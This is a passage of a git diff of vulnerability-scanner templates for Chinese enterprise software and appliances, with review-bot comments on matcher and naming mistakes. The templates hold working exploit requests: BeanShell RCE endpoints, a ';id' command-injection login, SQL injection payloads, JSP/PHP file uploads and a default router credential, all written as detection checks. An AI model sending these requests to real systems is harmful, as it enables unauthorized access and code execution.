diff --git a/http/cnvd/2021/CNVD-2021-30167.yaml.yaml b/http/cnvd/2021/CNVD-2021-30167.yaml.yaml
deleted file mode 100755
index 9a8826fc47..0000000000
--- a/http/cnvd/2021/CNVD-2021-30167.yaml.yaml
+++ /dev/null
@@ -1,79 +0,0 @@ -id: yonyou-nc-bshservlet-full-check - -info: - name: yonyou-nc-bshservlet-full-check - author: SleepingBag945 - severity: critical - description: 测试所有BshServlet RCE端点 - reference: - - https://github.com/parkourhe/yongYouNC-RCE/blob/master/poc.txt - tags: yonyou,nc - -http: - - method: GET - path: - - "{{BaseURL}}/servlet/~aim/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~alm/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~ampub/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~arap/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~aum/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~cc/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~cdm/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~cmp/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~ct/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~dm/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~erm/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~fa/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~fac/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~fbm/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~ff/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~fip/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~fipub/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~fp/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~fts/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~fvm/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~gl/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~hrhi/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~hrjf/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~hrpd/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~hrpub/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~hrtrn/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~hrwa/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~ia/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~ic/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~iufo/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~modules/bsh.servlet.BshServlet" 
- - "{{BaseURL}}/servlet/~mpp/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~obm/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~pu/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~qc/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~sc/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~scmpub/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~so/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~so2/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~so3/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~so4/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~so5/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~so6/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~tam/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~tbb/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~to/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~uap/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~uapbd/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~uapde/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~uapeai/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~uapother/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~uapqe/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~uapweb/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~uapws/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~vrm/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~yer/bsh.servlet.BshServlet" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "BeanShell Test Servlet" - - type: status - status: - - 200 diff --git a/http/cnvd/2022/CNVD-2022-43245.yaml b/http/cnvd/2022/CNVD-2022-43245.yaml index d2288c9132..8c24236126 100755 --- a/http/cnvd/2022/CNVD-2022-43245.yaml +++ b/http/cnvd/2022/CNVD-2022-43245.yaml @@ -28,12 +28,12 @@ http: matchers: - type: word part: body - words : + words: - "" - type: word part: header - words : + words: - "text/xml" - type: status 
diff --git a/http/cnvd/2023/CNVD-C-2023-76801.yaml b/http/cnvd/2023/CNVD-C-2023-76801.yaml index 109fe81cce..dac7a8f899 100644 --- a/http/cnvd/2023/CNVD-C-2023-76801.yaml +++ b/http/cnvd/2023/CNVD-C-2023-76801.yaml @@ -17,7 +17,7 @@ http: {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig", "parameterTypes":["java.lang.Object","java.lang.String"], "parameters":["{{randstr_2}}","webapps/nc_web/{{randstr_1}}.jsp"]} - + - | GET /{{randstr_1}}.jsp HTTP/1.1 Host: {{Hostname}} diff --git a/http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml b/http/default-logins/tp-link/tplink-r470gp-default-login.yaml similarity index 77% rename from http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml rename to http/default-logins/tp-link/tplink-r470gp-default-login.yaml index 236ef6136b..72a22019ca 100755 --- a/http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml +++ b/http/default-logins/tp-link/tplink-r470gp-default-login.yaml @@ -1,14 +1,14 @@ id: tp-link-tl-r470gp-ac-default-login info: - name: TP-LINK TL-R470GP-AC Default weak password + name: TP-LINK TL-R470GP-AC - Default Login author: SleepingBag945 severity: high description: | TP-LINK TL-R470GP-AC 默认口令123456 metadata: fofa-query: title="TL-R470GP-AC" - tags: tp-link,default-login,ac + tags: tp-link,default-login,router http: - raw: @@ -17,18 +17,13 @@ http: Host: {{Hostname}} Content-Type: application/json; charset=UTF-8 X-Requested-With: XMLHttpRequest - Connection: close {"method":"do","login":{"username":"admin","password":"0KcgeXhc9TefbwK"}} - - matchers-condition: and matchers: - type: word part: body words: - "\"stok\"" - "\"error_code\":0" - condition: and - - + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/other/consul-rexec-rce.yaml b/http/vulnerabilities/other/consul-rexec-rce.yaml deleted file mode 100755 index 921c957519..0000000000 --- a/http/vulnerabilities/other/consul-rexec-rce.yaml +++ /dev/null 
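Review bot: The first tp-link hunk leaves `id: tp-link-tl-r470gp-ac-default-login` untouched while the file is renamed to `tplink-r470gp-default-login.yaml`; the repository's template check is likely to flag the id/filename mismatch, so the rename is only half done. Change it to `id: tplink-r470gp-default-login`. The description in the same hunk still states the default password as 123456 while the request body sends `0KcgeXhc9TefbwK`; if that is the device's encoded form of 123456, a one-line comment saying so would save the next maintainer a lookup. The second hunk of this file also ends with `\ No newline at end of file`; add the trailing newline.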
@@ -1,34 +0,0 @@ -id: consul-rexec-rce - -info: - name: Consul Rexec RCE - author: SleepingBag945 - severity: critical - description: | - Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request. - metadata: - fofa-query: protocol="consul(http)" - tags: rce - -http: - - raw: - - | - GET /v1/agent/self HTTP/1.1 - Host: {{Hostname}} - - - matchers-condition: and - matchers: - - type: word - words: - - '"EnableRemoteScriptChecks":true' - condition: and - - - type: status - status: - - 200 - - -# msf -# search Hashicorp -# exploit/multi/misc/consul_service_exec \ No newline at end of file diff --git a/http/vulnerabilities/other/consul-service-rce.yaml b/http/vulnerabilities/other/consul-service-rce.yaml deleted file mode 100755 index 1b1cf8626e..0000000000 --- a/http/vulnerabilities/other/consul-service-rce.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: consul-service-rce - -info: - name: consul-service-rce - author: SleepingBag945 - severity: critical - description: | - Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request. - metadata: - fofa-query: protocol="consul(http)" - tags: rce - -http: - - raw: - - | - GET /v1/agent/self HTTP/1.1 - Host: {{Hostname}} - - - matchers-condition: and - matchers: - - type: word - words: - - "\"EnableScriptChecks\": true" - - "\"EnableRemoteScriptChecks\": true" - condition: or - - - type: status - status: - - 200 - - -# msf -# search Hashicorp -# exploit/multi/misc/consul_service_exec \ No newline at end of file diff --git a/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml b/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml index c18d32766c..e5ac882c42 100755 --- a/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml +++ b/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml 
@@ -2,7 +2,7 @@ id: secsslvpn-auth-bypass info: name: Secure Access Gateway SecSSLVPN - Authentication Bypass - author: SleepingBag945 + author: SleepingBag945 severity: high description: | The Secure Access Gateway SecSSL 3600 secure access gateway system has an unauthorized access vulnerability. An attacker can obtain the user list and modify the user account password through the vulnerability. diff --git a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml index b79048fe2f..593ee80e26 100644 --- a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml +++ b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml @@ -1,5 +1,4 @@ id: ruijie-nbr-fileupload - info: name: Ruijie NBR fileupload.php - Arbitrary File Upload author: SleepingBag945 @@ -28,7 +27,7 @@ http: Content-Type: image/jpeg - + - | GET /ddi/server/upload/{(unknown)}.php HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml index 807bde2465..707562c31c 100644 --- a/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml +++ b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml @@ -57,7 +57,7 @@ http: matchers-condition: and matchers: - type: dsl - dsl: + dsl: - status_code_2 == 200 - contains(body_2,'{{file-upload}}') - contains(header_2,'text/html') diff --git a/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml b/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml index 82f2f6d75b..391c58ed0f 100755 --- a/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml +++ b/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml 
@@ -27,11 +27,11 @@ http: Host: {{Hostname}} Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b Accept-Encoding: gzip - + --59229605f98b8cf290a7b8908b34616b Content-Disposition: form-data; name="upload"; filename="{(unknown)}.xls" Content-Type: application/vnd.ms-excel - + <% out.println("{{string}}");%> --59229605f98b8cf290a7b8908b34616b-- diff --git a/http/vulnerabilities/smartbi/smartbi-deserialization.yaml b/http/vulnerabilities/smartbi/smartbi-deserialization.yaml index 117851a77f..d15db6c37e 100755 --- a/http/vulnerabilities/smartbi/smartbi-deserialization.yaml +++ b/http/vulnerabilities/smartbi/smartbi-deserialization.yaml @@ -1,7 +1,7 @@ id: smartbi-deserialization info: - name: Smartbi windowunloading Interface - Deserialization + name: Smartbi windowunloading Interface - Deserialization author: SleepingBag945 severity: high description: | diff --git a/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml index 33ebd44c35..7253a8ede3 100755 --- a/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml +++ b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true fofa-query: app="TDXK-通达OA" - tags: tongda,fileupload,intrusive + tags: tongda,fileupload,intrusive,router variables: num: "999999999" @@ -59,6 +59,7 @@ http: matchers-condition: and matchers: - type: word + part: body_2 words: - '{{md5(num)}}' diff --git a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml index 0cb10d5fbd..afb03e3809 100755 --- a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml +++ b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml 
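Review bot: The first tongda-action-uploadfile hunk adds `router` to the tags of a Tongda OA file-upload template, which reads like a copy-paste from the tp-link change earlier in this commit; the tag would pull an OA check into router-scoped tag filters and does not describe the product. Keep `tags: tongda,fileupload,intrusive`. The `part: body_2` added in the second hunk is fine, since the `{{md5(num)}}` marker is only expected in the second response.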
@@ -23,15 +23,24 @@ http: title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER= + - | + POST /general/document/index.php/recv/register/insert HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))>128,1,710)))# =1&_SERVER= + matchers-condition: and matchers: - type: word - part: header + part: header_1 words: - "PHPSESSID=" - "register_for/?rid=" condition: and - - type: status - status: - - 302 \ No newline at end of file + - type: word + part: header_2 + words: + - "register_for/?rid=" + negative: true \ No newline at end of file diff --git a/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml b/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml deleted file mode 100755 index 6c8589bc4d..0000000000 --- a/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml +++ /dev/null 
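Review bot: The hunk drops the `status: 302` matcher and adds a `negative: true` word matcher on `header_2`; a negative matcher is satisfied whenever the string is absent, so a second request that times out, is blocked by a WAF, or returns any error page passes that leg, and the whole decision then rests on request 1 alone. The differential between the `<128` and `>128` forms only means something if both requests completed normally, so keep a status check that is scoped to the first request, e.g. `- type: dsl` with `dsl:` / `- "status_code_1 == 302"` (a plain `type: status` matcher cannot be pinned to one request). The first raw request begins above the hunk and is not visible here.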
@@ -1,36 +0,0 @@ -id: topsec-topapplb-arbitrary-login - -info: - name: Topsec TopAppLB Any account Login - Arbitrary Login - author: SleepingBag945 - severity: high - description: | - Any Account can log in to the background.Enter any account on the login page, the password is ;id - reference: - - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json - metadata: - max-request: 1 - fofa-query: title="TopApp-LB 负载均衡系统" - tags: topsec,topapplb,misconfig - -http: - - raw: - - | - POST /login_check.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Sec-Fetch-Site: same-origin - Sec-Fetch-Mode: navigate - Sec-Fetch-User: ?1 - Sec-Fetch-Dest: document - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - - userName=admin&password=%3Bid - - matchers: - - type: dsl - dsl: - - 'status_code_1 == 302 && contains(header_1,"redirect.php")' - condition: and \ No newline at end of file diff --git a/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml b/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml index fae8bd88a8..3b9fdb9b40 100755 --- a/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml +++ b/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml @@ -7,7 +7,7 @@ info: description: | Topsec TopAppLB is vulnerable to authetication bypass .Enter any account on the login page, the password is `;id`. reference: - - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json + - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json metadata: max-request: 1 verified: true @@ -24,7 +24,7 @@ http: userName=admin&password=%3Bid - | - GET / HTTP/1.1 + GET / HTTP/1.1 Host: {{Hostname}} cookie-reuse: true 
diff --git a/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml b/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml index 51231848eb..f765502cec 100755 --- a/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml +++ b/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml @@ -23,7 +23,7 @@ http: ]> + ]> &xxe; matchers-condition: and diff --git a/http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml b/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml similarity index 72% rename from http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml rename to http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml index 9812101f1c..2e5f3a1e1f 100755 --- a/http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml +++ b/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml @@ -1,15 +1,15 @@ -id: weaver-e-cology-verifyquicklogin-arbitrary-login +id: ecology-verifyquicklogin-auth-bypass info: - name: weaver e-cology verifyquicklogin.jsp arbitrarylogin + name: Weaver e-cology verifyquicklogin.jsp - Auth Bypass author: SleepingBag945 severity: high - description: 泛微OA E-Cology VerifyQuickLogin.jsp文件中存在任意管理员登录漏洞,攻击者通过发送特殊的请求包可以获取管理员Session + description: There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file. An attacker can obtain the administrator Session by sending a special request package. reference: - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html metadata: fofa-query: app="泛微-协同办公OA" - tags: ecology,weaver,oa + tags: ecology,weaver,oa,auth-bypass http: - raw: 
@@ -23,19 +23,18 @@ http: identifier=1&language=1&ipaddress=x.x.x.x - matchers-condition: and matchers: - type: word part: body words: - "\"sessionkey\":" + - type: word part: body words: - "\"message\":" + - type: status status: - - 200 - -# Enhanced by md on 2022/10/31 + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml index e0a26a518d..a7bf35dcfc 100755 --- a/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml +++ b/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml 
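Review bot: The hunk removes `matchers-condition: and` while three matchers remain (`"sessionkey":`, `"message":` and status 200); nuclei's default `matchers-condition` is `or`, so after this change any 200 response satisfies the template and the auth-bypass check will fire on every host that merely serves the page. Restore `matchers-condition: and` directly above `matchers:`. In the earlier hunk of this file the translated description calls the vendor "Panwei OA"; 泛微 is the company already named as Weaver in the `name` and `tags`, so `Weaver OA E-Cology` is the consistent wording.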
@@ -1,34 +1,34 @@ id: weaver-e-cology-validate-sqli info: - name: weaver-e-cology-validate-sqli + name: Weaver e-cology Validate.JSP - SQL Injection author: SleepingBag945 severity: high - description: 泛微e-cology OA系统的validate.jsp文件中,因为对参数capitalid过滤不严,可致使SQL注入漏洞。攻击者运用该漏洞,可在未授权的情况下,远程发送精心构造的SQL语句,从而取得数据库敏感信息。 - tags: ecology,weaver,oa,sqli + description: | + In the validate.jsp file of the Panwei e-cology OA system, the parameter capitalid is not strictly filtered, which can lead to SQL injection vulnerabilities. An attacker can use this vulnerability to remotely send carefully constructed SQL statements without authorization, thereby obtaining sensitive database information. + tags: ecology,weaver,sqli + +variables: + num1: "{{rand_int(40000, 44800)}}" + num2: "{{rand_int(40000, 44800)}}" + result: "{{to_number(num1)*to_number(num2)}}" http: - raw: - | POST /cpt/manage/validate.jsp?sourcestring=validateNum HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* Content-Type: application/x-www-form-urlencoded - Accept-Encoding: gzip - 
sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%
0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str(9039*926)&capitalnum=-10 - + sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%
0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str({{num1}}*{{num2}})&capitalnum=-10 matchers-condition: and matchers: - type: word part: body words: - - "8370114" + - "{{result}}" + - type: status status: - - 200 - -# Enhanced by md on 2022/10/31 -# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录 \ No newline at end of file + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml 